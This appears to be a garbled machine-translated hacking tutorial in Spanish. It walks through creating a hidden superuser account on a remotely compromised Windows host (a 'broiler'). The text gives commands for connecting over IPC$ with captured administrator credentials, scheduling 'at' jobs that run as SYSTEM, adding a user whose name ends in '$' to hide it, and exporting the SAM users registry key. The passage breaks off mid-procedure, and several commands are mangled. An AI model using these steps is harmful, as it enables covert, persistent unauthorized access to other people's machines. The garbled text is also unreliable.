Los maestros resumen los métodos que ocultan a los superusuarios. Los

superusuarios son usuarios responsables de administrar y mantener la red. Este término tiene un significado especial en la web de NetWare. El superusuario tiene acceso completo a todos los archivos, directorios y archivos, y es el primer usuario que inicia sesión en el servidor después de la instalación. El superusuario luego cambia inmediatamente la contraseña para que ningún otro usuario pueda acceder al servidor y obtener acceso ilimitado al superusuario. Entonces, ¿cómo se esconden los superusuarios en el sistema? Aquí hay una lista de los diversos métodos de superusuario ocultos en el sistema. Uno, cómo crear remotamente los superusuarios ocultos bajo la línea de comandos que usaré en El comando, porque la tarea programada generada por at se ejecuta como el sistema, por lo que no se usa el programa psu.exe. Para poder usar el comando at, el broiler debe tener el servicio de la programación. Si no está habilitado, se puede iniciar de forma remota mediante la herramienta netsvc.exe o sc.exe en el streamer. Por supuesto, el método también se puede utilizar siempre que se pueda iniciar el servicio de programación.
Para el modo de línea de comandos, puede usar una variedad de métodos de conexión, como usar SQLexec para conectar el puerto MSSQL 1433, también puede usar el servicio telnet, siempre que pueda obtener un cmdshell, y tenga el derecho de ejecutar el comando at.
1, primero encuentra un broiler, en cuanto a cómo encontrar que no es el tema que estoy hablando aquí. Aquí suponemos que hemos encontrado un broiler con un superusuario de administrador y una contraseña de 12345678. Ahora comenzamos a crear un superusuario oculto para él de forma remota desde la línea de comandos.
(El host en el ejemplo es un host en mi LAN. Cambié su dirección IP a 13.50.97.238. Por favor, no verifique el número en Internet para evitar acosar a la dirección IP normal.)
2. El broiler establece una conexión, el comando es: net use 13.50.97.238ipc $ " 12345678 " /user: " administrador
3, use el comando at para crear un usuario en el broiler (si el servicio no se inicia, puede usar el pequeño netsvc .exe o sc.exe para iniciar de forma remota):
hacking $ 1234 /add
Cree este nombre de usuario con el carácter $ porque se agrega Después del carácter $, el usuario no se mostrará con el usuario de red en la línea de comandos, pero el usuario se puede ver en el administrador de cuentas.
4, también use el comando at para exportar la clave HKEY_LOCAL_MACHINEsamsamDomainsaccountusers:
a 13.50.97.238 12:55 c: \\ winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e es regedit.exe El parámetro, en la clave _LOCAL_MACHINESAMSAMDomainsaccountusers debe terminar con. Si es necesario, puede incluir "ld:; c: \\ winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers "" entre comillas.